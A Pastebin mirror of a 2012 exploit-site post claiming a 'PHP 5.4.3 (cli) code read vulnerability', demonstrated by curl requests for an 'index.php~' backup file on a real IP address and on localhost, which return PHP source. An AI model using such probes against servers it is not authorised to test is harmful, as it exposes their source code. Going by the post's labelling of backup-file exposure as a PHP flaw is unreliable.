SHARE
TWEET

Mirror :: PHP 5.4.3 (cli) code read vulnerability

xanda Jun 15th, 2012 59 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Mirror of: http://1337day.com/exploits/18605
  2.  
  3. =============================================================
  4. # Exploit Title: PHP 5.4.3 (cli) code read vulnerability
  5.  
  6. # Date: 2012/13/06
  7.  
  8. # Author: cheki
  9.  
  10. # Software Link: http://php.net/downloads.php
  11.  
  12. # Version: PHP 5.4.3 (cli) (built: May  9 2012 15:06:10)
  13. Copyright (c) 1997-2012 The PHP Group
  14. Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
  15.  
  16. # Category: remote
  17.  
  18. # Tested on: Fedora release 17 (Beefy Miracle)
  19. =============================================================
  20.  
  21. #Demo: [root@cheki]# curl 109.234.119.2/index.php~
  22.  
  23. result: <?php
  24.  
  25. phpinfo();
  26.  
  27. ?>
  28.  
  29. #Target: http://localhost/index.php~
  30.  
  31. result: <?php
  32.  
  33. phpinfo();
  34.  
  35. ?>
  36. ============================================================
  37.  
  38. [root@cheki]# curl 109.234.119.2/index.php
  39.  
  40. result: NULL
  41.  
  42. #Target: http://localhost/index.php
  43.  
  44. result: NULL
  45.  
  46. ===========================================================
  47.  
  48. # Greetings to: kaxa giorgashvili, anuka bolqvadze, 1337day.com members and hacking.ge
  49.  
  50.  
  51. # 1337day.com [2012-06-13]
RAW Paste Data
Pastebin PRO Summer Special!
Get 40% OFF on Pastebin PRO accounts!
Top